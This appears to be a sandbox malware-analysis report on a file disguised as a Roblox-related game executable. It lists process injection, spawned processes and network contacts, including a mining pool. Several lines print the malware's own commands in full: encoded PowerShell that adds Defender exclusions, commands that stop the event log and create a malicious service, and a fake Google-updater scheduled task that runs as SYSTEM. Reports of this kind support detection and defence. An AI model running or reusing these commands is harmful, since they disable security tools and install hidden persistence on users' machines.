Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2372 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2372 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2372 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2372 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe
PID 2372 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe
PID 2372 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe
PID 4964 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4964 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4964 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4964 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe
PID 4964 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe
PID 4964 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe
PID 4964 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Users\Admin\AppData\Local\Temp\Roblox.exe
PID 4964 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Users\Admin\AppData\Local\Temp\Roblox.exe
PID 2372 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Users\Admin\AppData\Local\Temp\ccccc.exe
PID 2372 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Users\Admin\AppData\Local\Temp\ccccc.exe
PID 1712 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe C:\Windows\system32\dialer.exe
PID 1712 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe C:\Windows\system32\dialer.exe
PID 1712 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe C:\Windows\system32\dialer.exe
PID 1712 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe C:\Windows\system32\dialer.exe
PID 1712 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe C:\Windows\system32\dialer.exe
PID 1712 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe C:\Windows\system32\dialer.exe
PID 1712 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe C:\Windows\system32\dialer.exe
PID 3024 wrote to memory of 648 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\winlogon.exe
PID 3024 wrote to memory of 704 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\lsass.exe
PID 3024 wrote to memory of 1004 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 552 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\dwm.exe
PID 3024 wrote to memory of 732 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 760 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 704 wrote to memory of 2688 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 704 wrote to memory of 2688 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 2136 wrote to memory of 4360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 2136 wrote to memory of 4360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 704 wrote to memory of 2688 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 3024 wrote to memory of 1088 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 3024 wrote to memory of 1100 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 1212 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 1256 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 1288 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 1364 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 3024 wrote to memory of 1372 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 1424 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 1616 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 3024 wrote to memory of 1640 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 1664 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 1672 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 3024 wrote to memory of 1756 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 1792 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 3024 wrote to memory of 1852 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 1908 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 3024 wrote to memory of 2016 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 3024 wrote to memory of 2028 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 1840 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 3024 wrote to memory of 2108 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 2220 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\spoolsv.exe
PID 3024 wrote to memory of 2364 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 3024 wrote to memory of 2432 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 3024 wrote to memory of 2536 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 2544 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 2596 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 2668 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 3024 wrote to memory of 2688 N/A C:\Windows\system32\dialer.exe C:\Windows\sysmon.exe
PID 3024 wrote to memory of 2700 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 3024 wrote to memory of 2708 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe

"C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAeQB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAYQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAawBkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAdQBwACMAPgA="

C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe

"C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAcwBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAawBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAaABpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGkAZgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Roblox.exe

"C:\Users\Admin\AppData\Local\Temp\Roblox.exe"

C:\Users\Admin\AppData\Local\Temp\ccccc.exe

"C:\Users\Admin\AppData\Local\Temp\ccccc.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "HGJYCZBA"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "HGJYCZBA" binpath= "C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe" start= "auto"

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "HGJYCZBA"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe

C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gnbixakp#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

dialer.exe

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gnbixakp#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe

"C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Windows\System32\pcaui.exe

C:\Windows\System32\pcaui.exe -n 0 -a "" -v "" -g "" -x ""

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 496 -p 2868 -ip 2868

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2868 -s 460

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4292 -ip 4292

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4292 -s 1484

C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe

"C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1456 -ip 1456

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1456 -s 2092

Network

Country Destination Domain Proto
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 neoblox.is-from.space udp
US 172.67.165.148:443 neoblox.is-from.space tcp
US 172.67.212.247:443 us-east-1.tixte.net tcp
US 8.8.8.8:53 247.212.67.172.in-addr.arpa udp
DE 95.179.241.203:80 pool.hashvault.pro tcp

Files

C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe

MD5 fa532255379e9d0135b519e96b62f6ca
SHA1 099c0338db1a0aedf4e050ad0be7380034cf149e
SHA256 3335ee3c5d3f45de09712165a407755a051e5a2c812fa2a87d81431b5b3c583a
SHA512 fd2176004c7235bf215c2c62064559c023e47aa5def987c8344765d5f67a1dfb74e0bfb0ecd044bb1be247b3db4204a8c8bd2cbe622ba99bd81f0a6921c2bd4e

memory/3248-22-0x0000000002E30000-0x0000000002E66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe

MD5 07c00a89b882adab59d0b2e6eeac3516
SHA1 05ef4e1c48a3d081bb535b979e0e88a242cfdd48
SHA256 719f686324040140c4d8b03c5a35c4036b2a5535f1ee5aaf50ad79f2367126e2
SHA512 6a98ce5df9a7fbeb910bbea419b22794b7b4cde06f19222e55c1a21642a1e7b0036ae95022006de7ce8eabca78773ec07b01ee6e9d6ef6a6d7b62aebf5e15401

C:\Users\Admin\AppData\Local\Temp\Roblox.exe

MD5 fa9383ead577a1004af69c84708d66e0
SHA1 db0472630e63ae1819fdadbef7def6bbeb0c485e
SHA256 e8e0c6615894c8eecdb536ea891f042ca35e44afac88beddb9e9a4c79bb3c293
SHA512 6f67a6e52910c578e8ec953bfc1fb17d49b7fc1bc0337a5e3fe41e4572f0e2bdeaeb45b2be44ceda471ba64e8381cd08bdca1faec7dc2cdc67c6534e007ffd92

memory/3248-33-0x0000000005590000-0x0000000005BBA000-memory.dmp

memory/3000-35-0x0000000000340000-0x0000000000396000-memory.dmp

memory/3000-36-0x00000000024C0000-0x00000000024CA000-memory.dmp

memory/3248-37-0x0000000005320000-0x0000000005342000-memory.dmp

memory/3248-39-0x0000000005BC0000-0x0000000005C26000-memory.dmp

memory/3248-38-0x00000000054C0000-0x0000000005526000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yzxokpub.zx2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1628-58-0x0000000005E50000-0x00000000061A7000-memory.dmp

memory/3248-62-0x00000000062C0000-0x00000000062DE000-memory.dmp

memory/3248-63-0x0000000006870000-0x00000000068BC000-memory.dmp

memory/1628-66-0x0000000007260000-0x0000000007294000-memory.dmp

memory/1628-85-0x00000000074A0000-0x00000000074BE000-memory.dmp

memory/3248-68-0x0000000070670000-0x00000000706BC000-memory.dmp

memory/1628-67-0x0000000070670000-0x00000000706BC000-memory.dmp

memory/1628-86-0x00000000074C0000-0x0000000007564000-memory.dmp

memory/3248-88-0x0000000007600000-0x000000000761A000-memory.dmp

memory/1628-87-0x0000000007C40000-0x00000000082BA000-memory.dmp

memory/1628-89-0x0000000007690000-0x000000000769A000-memory.dmp

memory/1628-90-0x0000000007890000-0x0000000007926000-memory.dmp

memory/3248-91-0x0000000007810000-0x0000000007821000-memory.dmp

memory/1628-92-0x0000000007850000-0x000000000785E000-memory.dmp

memory/3248-93-0x0000000007860000-0x0000000007875000-memory.dmp

memory/1628-94-0x0000000007950000-0x000000000796A000-memory.dmp

memory/3248-95-0x0000000007940000-0x0000000007948000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 95b3af1c4e3702aee1179de79b0c6425
SHA1 392f6f1c38b9457a2ea152f9ed17f47f60191b01
SHA256 e875db059a037942a276b5e7b30ffdb4d1f896fdd43812ae067cc81d07153c0f
SHA512 af71b3d08de5423251c254ba9234239fac672f788a424b9a8442b2fd5abf6428a9f5b5ea737c7bdbd33fc311aa8efddd650f81d06ea47f5fef9e7dfd274b48f6

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 ac4917a885cf6050b1a483e4bc4d2ea5
SHA1 b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f
